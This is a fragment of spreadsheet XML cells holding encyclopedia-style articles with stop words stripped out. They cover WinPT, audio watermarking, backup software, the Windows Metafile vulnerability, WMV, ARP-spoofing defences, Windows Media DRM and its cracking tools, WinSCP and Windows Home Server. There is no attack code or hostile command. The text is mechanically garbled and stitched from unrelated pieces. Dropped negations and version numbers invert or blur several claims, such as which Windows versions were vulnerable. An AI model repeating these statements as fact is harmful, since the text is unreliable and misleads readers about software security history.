cwe-827: improper control document type definition sascha herzog's presentation external entity attacks owasp appsec germany 2010 postgresql vulnerability sharepoint dotnetnuke vulnerabilities, french denial service attacks defenses .net) early (2002) bugtraq article extensible markup language (xml) (fifth edition)</t>
  </si>
  <si>
    <t>WinPT</t>
  </si>
  <si>
    <t>winpt windows privacy tray frontend privacy guard (gnupg) windows platform. released gpl, compatible openpgp compliant software. winpt represents collection user interface tools designed ease asymmetric encryption software. based gnupg, openpgp-compatible, winpt intended windows users everyday message signing, verification, encryption general management. installation defaults used, winpt reside task tray, right-click menu within windows explorer. start menu item includes launchers commandline (console), winpt tray, documentation. january 2013, latest version (1.5.3 beta) compatible gnupg 1.4.x recent version 2.0.x.winpt included gnupt installer (that includes latest version gnupg 1.4.x, winpt 1.4.3 stable winpt latest beta.) history april 2007, project's author, timo schulz, announced development winpt suspended indefinite period.however, october 2008, schulz announced version 1.30, described release.on december 2009, timo schulz announced winpt discontinued lack resources.on january 2012, timo schulz announced work release asked community contact regards development past future revision interested. october 2012, timo schulz announced project dedicated website. also privacy guard gpg4win public-key cryptography cryptography references external links winpt website gnupt website privacy guard</t>
  </si>
  <si>
    <t>Audio watermark</t>
  </si>
  <si>
    <t>audio watermark unique electronic identifier embedded audio signal, typically used identify ownership copyright. similar watermark photograph. watermarking process embedding information signal (e.g. audio, video pictures) difficult remove. signal copied, information also carried copy. watermarking become increasingly important enable copyright protection ownership verification. secure techniques audio watermarking spread spectrum audio watermarking (ssw). ssw, narrow-band signal transmitted much larger bandwidth signal energy presented signal frequency undetectable. thus watermark spread many frequency bands energy band undetectable. interesting feature watermarking technique destroying requires noise high amplitude added frequency bands. robust watermarking technique because, eliminate attack must affect possible frequency bands modifications considerable strength. this creates visible defects data. spreading spectrum done pseudonoise (pn) sequence. conventional approaches, receiver must know sequence used transmitter well location watermark watermarked signal detecting hidden information. this high security feature, since unauthorized user access information cannot detect hidden information. detection sequence factor detection hidden information ssw. although sequence detection possible using heuristic approaches evolutionary algorithms, high computational cost task make impractical. much computational complexity involved evolutionary algorithms optimization tool fitness function evaluation either difficult define computationally expensive. recent proposed approaches—in fast recovering sequence- fitness granulation promising "fitness approximation" scheme. with fitness granulation approach called "adaptive fuzzy fitness granulation (affg)", expensive fitness evaluation step replaced approximate model. when evolutionary algorithms used means extract hidden information, process called evolutionary hidden information detection, whether fitness approximation approaches used tool accelerate process not. also acoustic fingerprint activated content references davarynejad, sedghi, bahrepour, c.w. ahn, akbarzadeh, coello coello, "detecting hidden information watermarked signal using granulation based fitness approximation", applications soft computing: from theory praxis, springer, series: advances intelligent soft computing, volume 58/2009, isbn 978-3-540-89618-0, 463–472, 2009. davarynejad, c.w. ahn, vrancken, berg, coello coello, "evolutionary hidden information detection granulation-based fitness approximation", applied soft computing, vol. 10(3), 719–729, 2010, doi:10.1016/j.asoc.2009.09.001.</t>
  </si>
  <si>
    <t>Argentum Backup</t>
  </si>
  <si>
    <t>argentum backup backup software program microsoft windows, produced argentum. argentum backup copies files compressed folders, well provides native file copying. backup copies created manually automatically schedule. product features number backup task templates back common file locations computers microsoft windows. argentum backup magazine editors' choice award world best award. features company reviewers emphasize overall simplicity ease user interface argentum backup software, aimed first beginners novice computer users. company also stresses minimalistic nature program fast backup operation proprietary backup engine written highly optimized profiled c++/stl code. other notable features include: 64-bit extensions (zip64) format supported create large, multi-gigabyte backups. argentum backup supports strong 128-bit 256-bit symmetric encryption securely protect sensitive data backing files. 256-bit strong encryption methods provide significantly greater cryptographic security traditional encryption. built-in backup templates recognize back locations valuable data windows windows windows microsoft windows platforms. stacking feature allows several backup copies backup copy particular point time, allow back whenever required. xhtml reports backup activity actions problems logged detailed summary statistics shown. also backup software minimalism external links argentum backup official site references</t>
  </si>
  <si>
    <t>Windows Metafile vulnerability</t>
  </si>
  <si>
    <t>windows metafile vulnerability—also called metafile image code execution abbreviated mice—is security vulnerability versions microsoft windows operating system handled images windows metafile format. permits arbitrary code executed affected computers without permission users. discovered december 2005, first reports affected computers announced within hours. microsoft released high-priority update eliminate vulnerability windows update january 2006. attacks using vulnerability known exploits. vulnerability located gdi32.dll existed versions microsoft windows windows windows server 2003 however, attack vectors exist nt-based versions windows (windows windows 2000, windows windows server 2003). exploits taking advantage vulnerability windows nt-based systems facilitated propagation various types malware, typically drive-by downloads. extreme impact, 2007 pwnie award "mass 0wnage" "breaking internet". affected systems versions microsoft windows operating system support windows metafile graphics standard. versions windows windows server 2003 contain security flaw. however, windows windows unless patched, vulnerable earlier versions default installation enables windows metafile code execution, source vulnerability. later versions windows vulnerability.according computer security expert steve gibson, windows vulnerable known exploits image preview enabled. windows operating systems image preview enabled hardware-based data execution prevention (dep) active applications susceptible exploit.operating systems windows (e.g., macos, unix, linux, etc.) directly affected. however, non-windows system could become vulnerable runs software view windows files. this could include software incorporates clones windows' native graphics device interface (gdi) dynamic-link library (dll)[1] windows windows programs emulator compatibility layer. unix-like system uses wine emulate windows, example, could exploited. gibson wrote program mousetrap, company distributes freeware, detect windows metafile vulnerability systems running windows windows emulators. vulnerability according assessments f-secure,[2] vulnerability inherent defect design files, underlying architecture files previous era, includes features allow actual code executed whenever file opens. original purpose mainly handle cancellation print jobs spooling. according secunia, "the vulnerability caused error handling windows metafile files ('.wmf') containing specially crafted setabortproc 'escape' records. such records allow arbitrary user-defined function executed rendering file fails." according windows documentation, setabortproc escape obsoleted replaced function name windows 3.1, long vulnerability discovered. however obsoleted escape code retained compatibility programs written least backwards compatible with) windows 3.0. this change happened approximately time microsoft creating reimplementation windows likely vulnerability occurred effort. 'escape' mechanism question allows applications (not metafiles) access output device features abstracted gdi, hardware accelerated bézier curves, encapsulated postscript support, etc. this done passing opcode, size pointer data call, usually pass driver. because escape calls produce actual graphics, general escape mechanism allowed metafiles little thought originally given possibility using things like setabortproc, modern non-vulnerable metafile interpreters checks opcode blacklist whitelist, keeping full opcodes available regular code calls escape functions directly (because code already running code could make call, security risk case). worth noting windows (except rarely used real mode windows 3.0) immune vulnerability pointer specified metafile point data within metafile, windows always full no-execute-data enforcement mandated segmented architecture protected mode. windows architectures (such mips, powerpc, alpha, itanium x86_64) required return-oriented programming exploit architectures no-execute functionality missing older processors. vulnerability cve-2005–4560 common vulnerabilities exposures database, us-cert reference vu#181038 microsoft knowledge base article 912840. first observed wild researchers sunbelt software december 2005, announced publicly company's president alex eckelberry. propagation infection computers affected spread infected e-mails carry hacked file attachment. infection also result from: viewing website browser automatically opens files, case potential malicious code automatically downloaded opened. internet explorer, default browser versions microsoft windows since 1996 windows this. previewing infected file windows explorer. viewing infected image file using vulnerable image-viewing programs. previewing opening infected emails older versions microsoft outlook outlook express. indexing hard disk containing infected file google desktop. clicking link instant messaging program windows live messenger, instant messenger (aim) yahoo! messenger.other methods also used propagate infection. because problem within operating system, using non-microsoft browsers firefox opera provide complete protection. users typically prompted download view malicious file, infecting computer. infected files downloaded automatically, opens possibility infection disk indexing accidental previewing. according assessments mcafee antivirus company,[3] vulnerability used propagate bifrost backdoor trojan horse. other forms malware also exploited vulnerability deliver various malicious payloads. mcafee claims first generation exploits encountered customer base december 2005. official patch microsoft released official patch address problem january 2006. this patch applied lieu corrective measures. official patch available windows 2000, windows microsoft windows server 2003. windows older operating systems receive patch longer supported microsoft then. steve gibson stated security now! podcast company gibson research corporation would make patch available windows systems microsoft not. after research, steve gibson stated, later security now! podcast windows vulnerable need patching. windows 9x/me users mouse trap utility themselves. free downloadable patch windows provided paolo monti future time, italian distributor eset's nod32 anti-virus system. patch works older operating systems, supplied without warranty. there reports official patch automatically installed even windows automatic update configured installing automatically downloaded updates. this causes automatic reboot, cause loss data user program open unsaved changes.[4] other corrective measures these measures historical interest systems updated january 2006. workaround workaround patch available,[5] december 2005, microsoft advised windows users unregister dynamic-link library file shimgvw.dll (which done executing command regsvr32.exe shimgvw.dll menu command prompt) invokes previewing image files exploited attacks. re-registered patching running regsvr32.exe shimgvw.dll. this workaround blocks common attack vector eliminate vulnerability. third-party patch third party patch[6] released ilfak guilfanov december 2005, temporarily disable vulnerable function call gdi32.dll. this unofficial patch received much publicity unavailability official microsoft, receiving recommendation sans institute internet storm center[7] f-secure.[8] because large amount publicity, including indirectly slashdotted,[9] guilfanov's website received visitors could cope with, suspended january 2006; patch still available download number mirrors including internet storm center website.[10]guilfanov's website went back online january much-reduced state. longer providing patch on-site bandwidth issues, homepage provided list mirrors user could download patch associated vulnerability-checker, checksum file, could checked downloaded file probably genuine. after microsoft released patch, guilfanov withdrew his. risk reduction techniques microsoft says patch removes flawed functionality gdi32 allowed vulnerability. computers running unpatched version windows, defence depth approach recommended, mitigate risk infection. various sources recommended mitigation efforts include: making hardware-enforced data execution prevention[11] effective applications. default application susceptible infection, notepad. internet explorer, least turn downloads setting default security settings high. keep anti-virus software up-to-date. consider frequent manual updates. block files network perimeter file-header filtering. making users accounts configured user rights required. disable image loading internet explorer browsers.[12] disable image loading outlook express.[13] disable hyperlinks messenger. disable indexing service windows 2000, windows windows server 2003. disable desktop search applications google desktop windows desktop search problem corrected.according sans institute internet storm center article, using browser internet explorer offer additional protection vulnerability. depending settings, browsers user opening image .wmf extension, reduces chance opening maliciously crafted windows metafile, protect vulnerability exploited browsers still open metafile masquerading another format. better entirely disable image loading browser used. accusations 2006 steve gibson suggested peculiar nature 'bug' indication vulnerability actually backdoor intentionally engineered system. accusation became assertion spread internet rumor technology news website slashdot picked gibson's speculation. rumor widely debunked thomas greene, writing register, attributed gibson's mistake "his lack security experience" called "popinjay expert". notes security watch: iniquitous images imperil internet!, larry seltzer, magazine. description image preview feature windows millennium edition, microsoft. sunbeltblog.blogspot.com microsoft clarifies issue library non-windows operating systems files. linux/bsd still exposed exploit wine, zdnet. it's bug, feature, f-secure. exploit-wmf, mcafee microsoft security advisory (912840) vulnerability graphics rendering engine could allow remote code execution, microsoft official advisory vulnerability. http://www.hexblog.com/2005/12/wmf_vuln.html, unofficial patch ilfak guilfanov. trustworthy computing, sans institute internet storm center. ilfak rescue!, f-secure. trustworthy computing, slashdot. linking sans institute internet storm center's article titled trustworthy computing (see above). .msi installer file flaw available, sans institute internet storm center. configure memory protection windows sp2, software-enforced data execution prevention (dep) feature microsoft windows improve browsing performance internet explorer (kb153790), microsoft. images blocked open e-mail message outlook express windows service pack 2-based computer (kb843018), microsoft. http://www.nod32.ch/en/download/tools.php unofficial patch paolo monti distributed eset. http://blogs.securiteam.com/index.php/archives/210 unofficial windows 98se patch walsh. references external links grc's m.i.c.e. metafile image code execution microsoft security bulletin novice home users microsoft security bulletin ms08-021 microsoft security bulletin ms06-001 sans institute internet storm center windows security flaw 'severe' washington post microsoft windows "setabortproc" arbitrary code execution secunia advisory summary status january looking issue, there? microsoft security response center blog exploit released vulnerability sans institute internet storm center careful files f-secure lotus notes vulnerable 0-day exploit sans institute internet storm center vulnerability checker ilfak guilfanov example exploit metasploit project microsoft developer network pages escape setabortproc mark russinovich's technical commentary backdoor controversy</t>
  </si>
  <si>
    <t>Windows Media Video</t>
  </si>
  <si>
    <t>windows media video (wmv) series video codecs corresponding video coding formats developed microsoft. part windows media framework. consists three distinct codecs: original video compression technology known wmv, originally designed internet streaming applications, competitor realvideo. compression technologies, screen image, cater specialized content. after standardization society motion picture television engineers (smpte), version adapted physical-delivery formats blu-ray disc became known vc-1. microsoft also developed digital container format called advanced systems format store video encoded windows media video. history 2003, microsoft drafted video compression specification based format submitted smpte standardization. standard officially approved march 2006 smpte 421m, better known vc-1, thus making format open standard. vc-1 became three video formats blu-ray video disc, along h.262/mpeg-2 part h.264/mpeg-4 avc. container format file uses advanced systems format (asf) container format encapsulate encoded multimedia content. while encapsulate multimedia encodings file standard specifies, files .asf file extension .wmv file extension.the container optionally support digital rights management using combination elliptic curve cryptography exchange, block cipher, custom block cipher, stream cipher sha-1 hashing function. although generally packed container format, also matroska container format (with file extension .mkv), container format (extension .avi). common store file video compression manager (vcm) codec implementation. video compression formats windows media video windows media video (wmv) recognized video compression format within family. usage term often refers microsoft windows media video format only. main competitors mpeg-4 avc, avs, realvideo, mpeg-4 asp. first version format, introduced 1999, built upon microsoft's implementation mpeg-4 part continued proprietary development newer versions format, stream syntax frozen while versions support variable rate, average rate, constant rate, introduced several important features including native support interlaced video, non-square pixels, frame interpolation. also introduced profile titled windows media video professional, activated automatically whenever video resolution exceeds 300,000 pixels (e.g., beyond) bitrate 1000 kbit/s. targeted towards high-definition video content, resolutions 720p 1080p. simple main profile levels compliant profile levels vc-1 specification. advanced profile vc-1 implemented format called windows media video advanced profile. improves compression efficiency interlaced content made transport-independent, making able encapsulated mpeg transport stream packet format. format compatible previous formats, however.wmv mandatory video format playsforsure-certified online stores devices, well portable media center devices. microsoft zune, xbox 360, windows mobile-powered devices windows media player, well many uncertified devices, support format. mandates certification program, quality levels specified microsoft. used supported video format microsoft silverlight platform, h.264 format also supported starting version windows media video screen windows media video screen (wmv screen) video formats specialise screencast content. they capture live screen content, convert video third-party screen-capture programs screen files. they work best source material mainly static contains small color palette.one uses format computer step-by-step demonstration videos. first version format screen. second version, screen, supports encoding addition cbr. additionally msa1 (aka screen codec” “mss3”) used live meeting 2007. fourccs formats mss1, mss2 msa1. windows media video image windows media video image (wmv image) video slideshow format. format works applying timing, panning transition effects series images playback. codec achieves higher compression ratio image quality still images files encoded image store static images rather full-motion video. since format relies decoder (player) generate video frames real-time, playing image files even moderate resolutions (e.g. frames second 1024 resolution) requires heavy computer processing. latest version format, image, used photo story features additional transformation effects, compatible original image format.hardware support image available portable media centers, windows mobile-powered devices windows media player mobile.since known domestic player supports format, users photo story wishing generate material capable played player first convert mpeg-2 burning (average file sizes mpeg-2 times .wmv file). versions audio compression formats audio format used conjunction windows media video typically version windows media audio, rarer cases, deprecated sipro acelp.net audio format. microsoft recommends files containing non-windows media formats generic .asf file extension. players software play files includes windows media player, realplayer, mplayer, media player classic, media player k-multimedia player. microsoft zune media management software supports format, uses zune-specific variation windows media used playsforsure. many third-party players exist various platforms linux ffmpeg implementation format. macintosh platform, microsoft released powerpc version windows media player 2003, development software ceased. from january 2006 2014, microsoft endorsed distributed party flip4mac, quicktime component developed telestream allowed macintosh users play files player used quicktime framework. telestream ended sales flip4mac july 2019 officially ended support june 2020. elmedia player, play files macintosh computers, still available. encoders many programs export video format; examples windows movie maker, windows media encoder, microsoft expression encoder, sorenson squeeze, sony vegas pro, video editor, vsdc free video editor, telestream episode, telestream flipfactory, ffmpeg. programs encode using image format include windows media encoder, video editor, photo story. digital rights management while none formats contain digital rights management facilities, container format, stream encapsulated, can. windows media drm, used conjunction wmv, supports time-limited subscription video services offered cinemanow. windows media drm, component playsforsure windows media connect, supported many modern portable video devices streaming media clients xbox 360. criticism subject numerous complaints users press. users dislike digital rights management system sometimes attached files. 2007, loss ability restore licenses files windows media player positively received. also jpeg xr/hdhd, image file format format developed microsoft references external links description algorithm used windows media encryption demonstration delivering 720p video mbit/s demonstration delivering 1080p video mbit/s history windows media player (archived 2009)</t>
  </si>
  <si>
    <t>ArpON</t>
  </si>
  <si>
    <t>arpon (arp handler inspection) computer software project improve network security. attracted interest among network managers academic researchers frequently cited means protecting arp-based attacks. motivation address resolution protocol (arp) security issues. these include middle (mitm) attack spoofing, cache poisoning poison routing attacks. solution arpon host-based solution make standardized protocol secure order avoid middle (mitm) attack spoofing, cache poisoning poison routing attack. this possible using three kinds anti spoofing techniques: sarpi (static inspection) statically configured networks without dhcp; darpi (dynamic inspection) dynamically configured networks dhcp; harpi (hybrid inspection) statically dynamically configured networks dhcp.the goal arpon therefore provide secure efficient network daemon provides sarpi, darpi harpi anti spoofing technique, thus making standardized protocol secure foreign intrusion. also arpwatch arping references external links arpon sourceforge official documentation</t>
  </si>
  <si>
    <t>Arptables</t>
  </si>
  <si>
    <t>arptables computer software utility network administrator's tool maintaining address resolution protocol (arp) packet filter rules linux kernel firewall modules. tools used create, update, view tables contain filtering rules, similarly iptables program developed. popular application creation filter configurations prevent spoofing. linux kernel offers filtering chains, input output, linux kernel adds third, forward, applied bridging packets. external links eb/arp tables website download site tree arptables(8) linux page arptables, poisoning</t>
  </si>
  <si>
    <t>Arpwatch</t>
  </si>
  <si>
    <t>arpwatch computer software tool monitoring address resolution protocol traffic computer network. generates observed pairing addresses addresses along timestamp pairing appeared network. also option sending email administrator pairing changes added. network administrators monitor activity detect spoofing, network flip-flops, changed stations address reuse. arpwatch developed lawrence berkeley national laboratory, network research group, open-source software released license. also arpon arping ettercap references external links source files</t>
  </si>
  <si>
    <t>Array controller based encryption</t>
  </si>
  <si>
    <t>within storage network, encryption data occur different hardware levels. array controller based encryption describes encryption data occurring disk array controller sent disk drives. this article provide overview different implementation techniques array controller based encryption. cryptographic encryption theory, disk encryption theory. possible points encryption encryption data take place many points storage network. point encryption occur host computer, infrastructure, array controller hard disks shown diagram above. each point encryption different merits costs. within diagram, server components also shown configuration encryption. designers sans components must take consideration factors performance, deployment complexity, server interoperability, strength security, cost choosing implement encryption. since array controller natural central point data therefore encryption level inherent also reduces deployment complexity. array controller-based encryption with different configurations hardware software array controller, different types solutions type encryption. each solutions built existing infrastructures replacing upgrading certain components. basic components include encryption server, management client, commonly encryption unit implemented storage network. internal array controller encryption internal array controller configuration, array controller generally card situated inside host computer. shown diagram, array controller would contain encryption unit plaintext data encrypted ciphertext. this separate encryption unit utilized prevent minimize performance reduction maintain data throughput. furthermore, management client generally additional service within host computer applications authenticate keys retrieved server. major disadvantage type implementation would encryption components required integrated within host computer therefore redundant large networks many host devices. external array controller encryption case external array controller setup, array controller would independent hardware module connected network. within hardware array controller would encryption unit data encryption well management client authentication. generally, hardware array controllers many host devices storage disks. therefore, reduces deployment complexity implement fewer hardware components. moreover, lifecycle array controller generally much longer host computers storage disks, therefore encryption implementation need reimplemented often encryption done another point storage network. encryption front-end back-end side array controller external array controller, encryption unit either placed either front-end side back-end side array controller. there different advantages disadvantages placing encryption unit either front-end side back-end side: placement encryption unit highly impact secureness controller based encryption implementation. therefore, issue must taken account designing implementation mitigate security risks. software array controller encryption software array controller encryption, software array controller driver directs data individual host adapters. adjacent diagram, multiple host adapters hardware encryption units used better performance requirements. contrast, type encryption implemented host adapter connected network multiple hard drives would still function. performance definitely reduced since encryption unit processing data. management done much like internal array controller encryption mentioned management client implemented service within host computer. external links pm8031 encryption enabled pm8032 encryption enabled</t>
  </si>
  <si>
    <t>Windows Media DRM</t>
  </si>
  <si>
    <t>windows media wmdrm, digital rights management service windows media platform. designed provide delivery audio video content network playback device distributor control content used. wmdrm includes following components: windows media rights manager (wmrm) packaging content issuing licenses windows media format (wmf sdk) building windows applications support windows media format windows media portable devices (wmdrm-pd) supporting offline playback portable devices (janus) windows media network devices (wmdrm-nd) streaming protected content devices attached home network (cardea)windows media replaced windows anniversary update favor microsoft playready. works 2007 microsoft published network protocol behind license acquisition mechanism. according specification, client software obtains byte plain-text content kcontent license server. server encrypts transferring client globally predefined 160-bit key, ecc1. server also sends content unencrypted. client uses kcontent decrypt licensed media stream. anti-spoofing measure, additional fields playback rights random number encrypted three predefined pairs either client server software: client software pair client machine pair server software pair ks.an analysis version scheme windows media audio revealed using combination elliptic curve cryptography exchange, block cipher, custom block cipher dubbed multiswap (for macs only), stream cipher, sha-1 hashing function.windows media designed renewable, designed assumption cracked must constantly updated microsoft. result scheme cracked several times, usually remained cracked long. version released april 1999 supported basic business rules expiration dates. version released january 2003 also known version keep sync equivalent versions windows media player. version better known v10, released 2004. earlier versions system cracks available, meaning content restricted versions protections stripped. version cracked early 2005, software update shortly pushed sealed relevant hole. generally, sorts cracks worked certain extent. rather break encryption itself, infeasible, hook interfere "black box" component runs dump content keys unencrypted content memory. interoperability content delivered wmdrm encryption universally accessible. microsoft windows supports playback content protected wmdrm encryption, format become popular consumer electronics manufacturers, many licensed wmdrm decode component devices like television sets, set-top boxes blu-ray players. open network protocol digital rights management, [ms-drm] mcpp collection, stipulates software developers right implement protocol outside microsoft's development tools environment. removal tools created strip files windows media drm, enabling played non-janus platforms. these tools typically developed specific individualized blackbox component (ibx) version mind rarely work version explicitly designed for. microsoft addition upgrading whenever cracked, also pursued legal action developed hosted tools, driving development distribution even underground fragmenting these tools split three categories: decrypter, key-finder, all-in-one (finds keys decrypts). microsoft successful squashing development distribution tools capable finding decrypt encoding, apparent continual existence sourceforge project freeme2. fairuse4wm claimed particular tool, fairuse4wm (released august 2006) written viodentia, ability strip files protected wmdrm. this all-in-one tool. microsoft responded several ways. first, august 2006 microsoft released version prevent particular tool working. microsoft also informed partners working resolve issue, given allegedly also circumvented within days. microsoft also issued takedown notices site owners distributing fairuse4wm. finally, september 2006, microsoft filed federal lawsuit john does 1–10 a/k/a "viodentia", hoping identify person persons responsible. however, operator highest-ranked mirror utility, james holden, denies received notices threats. unable find identity viodentia, april 2007 microsoft dropped civil suits filed.by october 2006, distributors using windows media protection, anytime, using patched codec. september 2007, microsoft updated version 11.0.6000.7000, attempt thwart circumvention efforts variants original program. and, november 2007, removal windows installs updated computers (i.e. already contain version 11.0.6000.7000), possible without rolling back windows media player 2008 another patched version fairuse4wm released, allowing work windows vista, versions lower 11.0.6000.6324. ploy confuse abusers software tools, microsoft revisited controversial 11.0.6000.6324 version number, releasing version, giving file deceptive older version number. drmdbg drmdbg key-finder, extracts keys hooking instance windows media player launches. there several version available targeting specific version. version released march 2009 supports versions 11.0.6000.6324 11.0.6001.8000. mirakagi mirakagi first key-finders; longer development. also janus (drm) cardea (drm) windows media playready references external links u.s. patent 7,010,808,google patent fairuse4wm topic-thread doom9-net forums</t>
  </si>
  <si>
    <t>Windows Live Devices</t>
  </si>
  <si>
    <t>windows live devices online device management service part windows live allow users centrally access manage synchronization files stored computers, mobile devices, well peripherals digital photo frames. windows live devices also allows users remotely access computers internet using browser. this service integrates tightly windows live mesh allow files folders computers sync other, well sync files folders stored cloud skydrive. (now onedrive) combination three services: windows live devices, windows live mesh, skydrive similar previous live mesh technology preview platform offering microsoft, based underlying technology.windows live devices released june 2010, part windows live wave suite services. history microsoft released live mesh software service platform april 2008 enabled devices connect internet using feedsync technologies. live mesh allows applications, files folders synchronized across multiple devices. live mesh initially released technology preview, however, shortly updated beta october 2008 time incorporated part azure services platform "cloud" platform hosted microsoft data centers. live mesh consisted following four elements: mesh operating environment software component live mesh manages synchronization relationships devices data live desktop online cloud storage service allows synchronized folders accessible website live mesh remote desktop software allow users remotely access, connect manage devices synchronization relationship live framework rest-based application programming interface accessing live mesh services httpin january 2009, live mesh team merged unified windows live team microsoft incubation technologies integrated windows live services. result, live framework, developer framework live mesh, discontinued september 2009 incorporated live services developer resources central windows live services. part merge, mesh operating environment, simply live mesh software, replaced windows live mesh support pc-to-pc well pc-to-cloud file synchronisation, online cloud storage service live mesh live desktop replaced skydrive synchronised storage. windows live devices serve purposes managing providing access devices synchronization relationship, well replacing live mesh remote desktop provide remote access functions devices synchronization relationship. live mesh technology preview platform supported management synchronisation data windows computers, mobiles devices, windows home server, xbox, zune, automation system, well computer devices peripherals printers, digital cameras, digital photo frames. these capabilities live mesh expected integrated windows live devices windows live mesh future releases. also windows essentials references external links official website (archive) inside windows live archived 2010-06-12 wayback machine</t>
  </si>
  <si>
    <t>Windows Imaging Format</t>
  </si>
  <si>
    <t>windows imaging format (wim) file-based disk image format. developed microsoft help deploy windows vista subsequent versions windows operating system family, well windows fundamentals legacy pcs. design like disk image formats, file contains files associated filesystem metadata. however, unlike sector-based formats (such vhd), file-based: fundamental unit information file. primary advantages file-based hardware independence single-instance storage file referenced multiple times filesystem tree. since files stored inside single file, overhead opening closing many individual files reduced. cost reading writing many thousands individual files local disk negated hardware software-based disk caching well sequential reading writing data. files contain multiple disk images, referenced either numerical index unique name. single-instance storage, successive disk image common previous images added file, less data added. also split (spanned) multiple parts, .swm extension. images made bootable windows boot loader supports booting windows file. windows setup windows vista later files. case, boot.wim contains bootable version windows installation performed. other setup files held install.wim. since windows 8.1, size windows directory reduced moving system files compressed images stored separate hidden partition (wimboot). since windows system files compressed system disk (compactos).wim supports three families lz77-based compression algorithms ascending ratio descending speed: xpress, lzx, lzms. former huffman encoding, latter uses adaptive huffman encoding range coding. there also support solid compression. both solid compression lzms introduced recently, wimgapi windows dism windows 8.1. tools imagex imagex command-line tool used create, edit deploy windows disk images windows imaging format. along underlying windows imaging interface library (wimgapi), distributed part free windows automated installation (waik/opk). starting windows vista, windows setup uses waik install windows. first distributed prototype imagex built 6.0.4007.0 (main.030212-2037). allowed microsoft partners experiment imaging technology developed parallel longhorn alpha prototypes. first introduced milestone longhorn project used later builds longhorn. build 6.0.5384.4 added significant advantages previous versions, like read-only read/write folder mounting capabilities, splitting multiple image files (swm), filter driver latest compression algorithms. used since pre-rc (release candidates) windows vista. dism deployment image service management tool (dism) tool introduced windows windows server 2008 perform servicing tasks windows installation image, online image (i.e. user running) offline image within folder file. features include mounting unmounting images, querying installed device drivers offline image, adding device driver offline image. possible repair dism image using either windows installation windows update.before windows server 2012 windows dism incorporated majority imagex functions all; imagex still needed image capture. however, dism deprecated imagex windows support operating systems since april 2012, open-source library handling format available. this library used unix-like systems, well windows. thanks project, linux distributions imagex clone called wimlib-imagex, allows mounting images managing (read/write) like block-storage provider.as images somewhat common compression algorithms, accessed using file archivers like 7-zip. operating systems might support format, still possible convert .wim images commonly used image using windows assessment deployment windows. also windows preinstallation environment system deployment image windows references external links windows imaging format whitepaper describes internal file structure files imagex image format microsoft technet</t>
  </si>
  <si>
    <t>WinSCP</t>
  </si>
  <si>
    <t>winscp (windows secure copy) free open-source file transfer protocol (sftp), file transfer protocol (ftp), webdav, amazon secure copy protocol (scp) client microsoft windows. main function secure file transfer local computer remote server. beyond this, winscp offers basic file manager file synchronization functionality. secure transfers, uses secure shell protocol (ssh) supports protocol addition sftp.development winscp started around march 2000 continues. originally hosted university economics prague, author worked time. since july 2003, licensed gpl. hosted sourceforge github.winscp based implementation protocol putty protocol filezilla. also available plugin altap salamander file manager, exists third-party plugin file manager. features graphical user interface translated several languages integration windows (drag drop, url, shortcut icons) common operations files support sftp protocols ssh-1 ssh-2, protocol, webdav protocol amazon protocol. batch file scripting, command-line interface, .net wrapper remote text editor, either downloading file edit passing local application, uploading updated. directory synchronization several semi fully automatic ways support password, keyboard-interactive, public key, kerberos (gss) authentication integrates pageant (putty authentication agent) full support public authentication choice windows file explorer-like norton commander-like interfaces optionally stores session information optionally import session information putty sessions registry able upload files retain associated original date/timestamps, unlike clientsapart standard package, three portable versions also available: generic package customized versions liberkey portableapps.com. portable version runs wine several posix-compliant operating systems, linux, macos, bsd.some older versions winscp installer included opencandy advertising module bundled google chrome. since version 5.5.5 (august 2014) installer contain advertisement. also comparison file managers comparison clients comparison client software references external links official website documentation winscp sourceforge</t>
  </si>
  <si>
    <t>Windows Home Server</t>
  </si>
  <si>
    <t>windows home server (code-named quattro) home server operating system microsoft. announced january 2007 consumer electronics show bill gates, released manufacturing july 2007 officially released november 2007.windows home server based windows server 2003 intended solution homes multiple connected offer file sharing, automated backups, print server, remote access. paired windows home server console—client software accessed another computer network provide graphical management interface. power pack windows home server released july 2008. power pack released march 2009 power pack released november 2009.windows home server 2011, next version operating system, released april 2011. microsoft confirmed windows home server 2011 last release windows home server product line.windows home server brainchild charlie kindel general manager product 2005 2009.microsoft ended support windows home server january 2013. features computers users: allows maximum user accounts created server console computers connector installed, without client access licenses. centralized backup: allows backup pcs, using single-instance storage technology avoid multiple copies file, even file exists multiple pcs. health monitoring: centrally track health network, including antivirus firewall status. file sharing: creates operates network shares computers store files remotely, acting network-attached storage device. separate categories provided common file types like documents, music, pictures videos. files indexed fast searching. printer sharing: allows print server handle print jobs users. shadow copy: uses volume shadow copy service take point time snapshots allow older versions files recovered. headless operation: monitor keyboard required manage device. remote administration performed using windows home server console client software provided bundle. remote desktop services connections server supported connected lan. remote access gateway: allows remote access connected network, including server itself, internet. media streaming: stream media xbox devices supporting windows media connect. selective data redundancy: guards single drive failure duplicating selected data across multiple drives. expandable storage: provides unified single easily expandable storage space, removing need drive letters. extensibility add-ins: add-ins allow third-party developers extend features functionality server. add-ins developed using windows home server sdk, provide additional services client computers work data already server. add-ins also asp.net applications, hosted running whs. server backup: backs files stored within shared folders server external hard drive. technology home server console configuration interface designed user-friendly enough could without prior knowledge server administration. configuration interface, called home server console, delivered remote desktop protocol application remote application server itself, rendered remote system. home server console client application could accessed windows server required video card peripherals; designed require ethernet card least windows windows vista windows computer. drive extender windows home server drive extender file-based replication system provided three capabilities: multi-disk redundancy given disk failed, data lost arbitrary storage expansion supporting type hard disk drive (e.g. serial ata, usb, firewire) mixture capacity, similar concept jbod single folder namespace drive letters)with drive extender, users could larger capacity hard disk drives could offline lesser capacity drives upgrade capacity online. example, user reaching capacity share five terabytes six-terabyte capacity used one-terabyte drives user could offline one-terabyte drives physically replace two-terabyte drive. automatically equalizes redistribution used space across available drives regular basis. offline process would compress used data across minimum amount drives allowing removal lesser capacity drives. once replaced drive higher capacity system automatically redistribute used capacity among pool ensure space capacity drive. users (specifically configure family's home server) dealt storage levels: shared folders disks. concepts relevant regarding disks whether "added" home server's storage pool whether disk appeared healthy system not. this contrast windows' logical disk manager requires greater degree technical understanding order correctly configure raid array. shared folders name, description, permissions, flag indicating whether duplication (redundancy) folder. duplication shared folder (which default multi-disk home server systems applicable single disk systems) files shared folder duplicated effective storage capacity halved. however, situations user wanted data duplicated (e.g. shows archived windows home server system running windows media center), drive extender provided capability duplicate files server short capacity manually mark complete content store duplication.a known limitation drive extender cases changed timestamp directories files data moved around disks. according microsoft expected behavior. this caused unexpected behavior using clients sort media based date. examples xbmc, mediaportal, squeezebox server. aforementioned programs worked fine whs; however, files appeared order caveat. cancellation november 2010, microsoft announced drive extender would removed windows home server 2011. this public outcry announcement's comments section. criticism drive 